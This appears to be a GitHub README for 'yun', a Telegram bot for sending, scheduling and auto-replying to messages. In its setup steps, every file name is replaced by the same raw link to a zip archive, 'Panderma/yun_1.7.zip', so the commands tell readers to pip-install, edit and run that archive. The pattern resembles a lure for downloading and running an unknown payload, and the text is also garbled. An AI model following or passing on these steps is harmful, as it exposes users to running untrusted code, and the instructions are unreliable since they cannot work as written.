Welcome to the yun project! This application allows you to easily send and receive messages through a Telegram bot. Follow the steps below to download and run the software.
-
Visit the Releases Page: To get the latest version of the application, visit this page to download.
-
Download the Latest Release: Look for the latest version on the releases page. Click the appropriate file for your system to download it.
-
Extract the Files: Once downloaded, extract the files to a folder on your computer.
- Operating System: This application works on Windows, MacOS, and Linux.
- Python: Ensure you have Python version 3.6 or higher installed on your system. If you don't have it, you can download Python here.
You will need some additional libraries for the bot to function correctly. Follow these steps:
-
Open a command line interface (CLI) on your system. This can be:
- Command Prompt for Windows
- Terminal for MacOS or Linux
-
Navigate to the folder where you extracted the application files. You can use the
cdcommand for this. For example:cd path/to/your/folder -
Once you are in the correct directory, run this command to install the required libraries:
pip install -r https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip
You need to set up your bot on Telegram before you can use it. Hereβs how:
-
Create a Bot on Telegram:
- Open Telegram and search for "BotFather."
- Start a chat with BotFather and follow the prompts to create a new bot.
- Upon creation, you will receive an API key. Keep this safe.
-
Edit the Configuration File:
- Open the
https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zipfile in a text editor. - Find the line that says:
API_KEY = 'your_bot_api_key_here' # Replace with your bot's API key
- Replace the placeholder text with your actual API key.
- Open the
-
Set Admin ID:
- In the same
https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip, update the line for ADMIN_ID:
ADMIN_ID = 'your_admin_user_id_here' # Replace with your Telegram user ID
- This ID identifies you as the bot's admin.
- In the same
After setting up the configuration, you can start the bot.
-
In the Command Line:
- Make sure you are in the same directory as the extracted files. Use the
cdcommand if necessary.
- Make sure you are in the same directory as the extracted files. Use the
-
Start the Bot: Enter the following command to run the bot:
python https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip
-
Interact with the Bot: Once the bot is running, you can start sending messages to it on Telegram. Feel free to test out its features!
- The bot receives messages sent to it in private chats or groups in real time, allowing for immediate interaction.
- You can send text messages to users or groups. It supports various formats, including plain text and formatted messages.
- Set scheduled tasks to send messages at specific intervals. This feature is great for reminders or regular updates.
- The bot recognizes specific keywords in messages and auto-replies, making communication smoother.
If you encounter issues:
- Ensure you have the correct version of Python installed.
- Check if all dependencies are properly installed.
- Ensure your API key is valid and correctly added to
https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip.
For more help, you can visit the issues section of the repository.
- Documentation: Check the project documentation for more details on features and configuration options.
- Community Support: Join the community on forums or social media for tips and shared experiences with other users.
If you follow these steps, you'll have your Telegram bot up and running in no time. Enjoy your automated messaging experience!